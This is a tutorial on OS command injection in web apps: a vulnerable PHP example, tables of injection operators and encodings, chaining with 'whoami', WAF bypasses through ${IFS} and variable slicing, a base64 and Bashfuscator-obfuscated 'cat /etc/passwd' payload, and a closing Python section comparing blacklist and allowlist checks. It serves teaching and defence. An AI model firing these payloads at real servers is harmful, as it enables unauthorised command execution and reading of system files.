Command Injections
Execute system commands on the back-end server
There are several types of injection found in web apps. The most common are:
Injection | Description |
---|---|
OS Command Injection | User input is used as part of an OS command. |
Code Injection | User input is used within a function that evaluates code. |
SQL Injection | User input is used as part of an SQL query. |
XSS/HTML Injection | User input is displayed on a web page. |
OS Command Injections
With OS command injection, the user input must reach a call in the back-end that executes a system command. Therefore, look for the functions in each programming language that execute system commands.
PHP
A web application written in PHP may use exec, system, shell_exec, passthru, or popen.
<?php
if (isset($_GET['filename'])) {
system("touch /tmp/" . $_GET['filename'] . ".pdf");
}
?>
Here touch is executed with unsanitized user input, which makes it vulnerable.
Detection
Finding out whether an input is vulnerable to command injection:
Injection Operator | Injection Character | URL-Encoded Character | Executed Command |
---|---|---|---|
Semicolon | ; | %3b | Both |
New Line | \n | %0a | Both |
Background | & | %26 | Both (second output generally shown first) |
Pipe | \| | %7c | Both (only second output is shown) |
AND | && | %26%26 | Both (only if first succeeds) |
OR | \|\| | %7c%7c | Second (only if first fails) |
Sub-Shell | `` | %60%60 | Both (Linux-only) |
Sub-Shell | $() | %24%28%29 | Both (Linux-only) |
Bypassing Front-End Validation
Input may be validated only on the front-end and not on the back-end. Front-end validation can be bypassed by, for example, URL-encoding the payload. We can use && to chain commands:
ping -c 1 127.0.0.1 && whoami
Or use the OR (||) operator, which only executes the second command if the first command fails.
Other operators
Injection Type | Operators |
---|---|
SQL Injection | ' , ; -- /* */ |
Command Injection | ; && |
LDAP Injection | * ( ) & \| |
XPath Injection | ' or and not substring concat count |
OS Command Injection | ; & \| |
Code Injection | ' ; -- /* */ $() ${} #{} %{} ^ |
Directory Traversal/File Path Traversal | ../ ..\\ %00 |
Object Injection | ; & \| |
XQuery Injection | ' ; -- /* */ |
Shellcode Injection | \x \u %u %n |
Header Injection | \r %0d %0a %09 |
Filter/WAF Detection
Web applications may use a WAF that has a list of blacklisted characters. Try various characters to see which are not blocked. Blacklisted spaces can be bypassed in several ways:
- Tabs = %09
- IFS = ${IFS}
- Brace expansion = {ls,-la}
Another option is to take the / character from an environment variable such as PATH:
echo ${PATH:0:1}
/
Or a semicolon:
echo ${LS_COLORS:10:1}
;
Or encode the command in base64 and decode it at runtime:
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
Bashfuscator can be used to obfuscate bash commands.
$ /bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1
[+] Mutators used: Token/ForCode
[+] Payload:
eval "$(W0=(w \ t e c p s a \/ d);for Ll in 4 7 2 1 8 3 2 4 8 5 7 6 6 0 9;{ printf %s "${W0[$Ll]}";};)"
[+] Payload size: 104 characters
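As an added example (not from the original notes or from any tool mentioned here), the following Python check shows why a character blacklist like the one described above misses the bypasses listed (URL-encoded newlines, `${LS_COLORS:10:1}`, `${PATH:0:1}`, `${IFS}`), and what the back-end should do instead: allowlist the filename and pass it as a single argv element so no shell ever parses it. All function names and sample inputs are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Injection operators from the detection table above, in decoded form.
OPERATORS = [";", "\n", "&&", "||", "&", "|", "`", "$("]
# A typical WAF-style blacklist also blocks space and slash.
BLACKLIST = OPERATORS + [" ", "/"]

def url_decode(value: str) -> str:
    """Decode repeatedly so a double-encoded %253b still ends up as ';'."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    return value

def blacklist_hits(value: str, decode: bool = True) -> list:
    """Blacklist check: which blocked tokens appear literally in the input."""
    text = url_decode(value) if decode else value
    return [tok for tok in BLACKLIST if tok in text]

# Allowlist: a filename is one plain token, nothing else (constructed policy).
FILENAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}\Z")

def allowlisted(value: str) -> bool:
    """Allowlist check: accept only a plain filename token after decoding."""
    return FILENAME_RE.fullmatch(url_decode(value)) is not None

def touch_argv(filename: str) -> list:
    """argv the PHP example should build: no shell, the name is one argument."""
    if not allowlisted(filename):
        raise ValueError("rejected filename")
    return ["touch", f"/tmp/{filename}.pdf"]

# Constructed inputs mirroring the page's operators and filter bypasses.
SAMPLES = {
    "report": "benign",
    "report;id": "literal operator",
    "report%0aid": "URL-encoded newline",
    "report${LS_COLORS:10:1}id": "semicolon taken from a variable slice",
    "x${PATH:0:1}tmp": "slash taken from a variable slice",
    "report${IFS}id": "space via IFS",
}

def compare(samples=SAMPLES) -> dict:
    """Per sample: (raw blacklist hits, decoded blacklist hits, allowlisted?)."""
    return {s: (blacklist_hits(s, decode=False), blacklist_hits(s), allowlisted(s))
            for s in samples}
```

Running `compare()` shows the blacklist catching only the literal `;` and, after decoding, the `%0a` newline, while the variable-slice and `${IFS}` inputs pass it untouched; the allowlist rejects every sample except the benign one.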